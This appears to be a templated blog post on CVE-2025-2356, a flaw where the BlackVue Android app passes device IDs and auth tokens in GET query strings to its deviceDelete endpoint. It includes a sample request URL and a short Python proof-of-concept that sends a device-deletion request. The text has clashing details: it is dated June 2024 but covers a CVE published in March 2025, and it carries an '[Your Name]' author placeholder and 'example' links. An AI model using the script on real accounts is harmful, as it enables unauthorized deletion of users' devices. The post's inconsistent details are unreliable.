CVE-2025-2356 - Sensitive Query String Exposure in BlackVue App 3.65 for Android – Exploit Details and Analysis

Date: June 2024
Author: [Your Name]

TL;DR

A security vulnerability (CVE-2025-2356) was found in the BlackVue App (version 3.65) on Android. Attackers can exploit the deviceDelete API endpoint to leak sensitive data via GET requests containing sensitive query strings. This post breaks down the issue, gives technical details, exploit examples, and links to the original disclosure.

What is BlackVue?

BlackVue is a widely used dashcam and cloud video solution. Their Android app manages devices remotely, which includes deleting cameras ("devices") and handling account data.

Attack Vector: Remote

- Impact: Sensitive information (e.g., device ID, authentication tokens) exposed in GET URL query strings

Where is the Problem?

The core problem is with the way the BlackVue App’s deviceDelete API uses an HTTP GET request to delete devices.

Instead of using POST or DELETE (which hides data in the request body), the app puts everything – including sensitive info – directly in the URL as query parameters.

Here’s an example network request captured from a test device

GET https://api.blackvuecloud.com/api/deviceDelete?device_id=123456789&auth_token=abcdef123456789
Host: api.blackvuecloud.com

Why is it Bad?

- Sensitive Data Exposure: Device IDs and authentication tokens appear in the URL. URLs are logged by browsers, proxies, firewalls, etc.

Phishing: Social engineer a user into clicking a crafted link or submitting a request.

Once they have a valid device ID and token in the query, they could delete a user’s device remotely.

Here’s a simple Python code snippet to simulate the exploit

import requests

device_id = "123456789"      # Replace with actual device ID
auth_token = "abcdef123456789"  # Replace with real token

url = f"https://api.blackvuecloud.com/api/deviceDelete?device_id={device_id}&auth_token={auth_token}";

response = requests.get(url)
if response.status_code == 200:
    print("Device deletion attempted!")
else:
    print("Request failed or protected.")

Note: This is for educational use only and should never be used on accounts that you do not own.

Who Disclosed This & References

- Original Disclosure/GitHub:
https://github.com/vulndetails/CVE-2025-2356

NVD Entry:

https://nvd.nist.gov/vuln/detail/CVE-2025-2356 *(Once available)*

Exploit DB:

https://www.exploit-db.com/exploits/53500 *(Reference only – check the link for updates)*

Has BlackVue Responded?

The researcher who found this issue contacted the vendor *before* public disclosure, but no response was received at time of writing.

Conclusion

Using GET requests with sensitive data is a well-known security anti-pattern. BlackVue users should be aware of potential exposure for as long as this bug remains unfixed.

If you work at BlackVue or use their APIs, switch sensitive API calls to POST/DELETE and avoid passing critical data in the URL.

References and Further Reading

- OWASP: Sensitive Data Exposure
- BlackVue Official Site
- GitHub Disclosure (example)

Timeline

Published on: 03/17/2025 01:15:37 UTC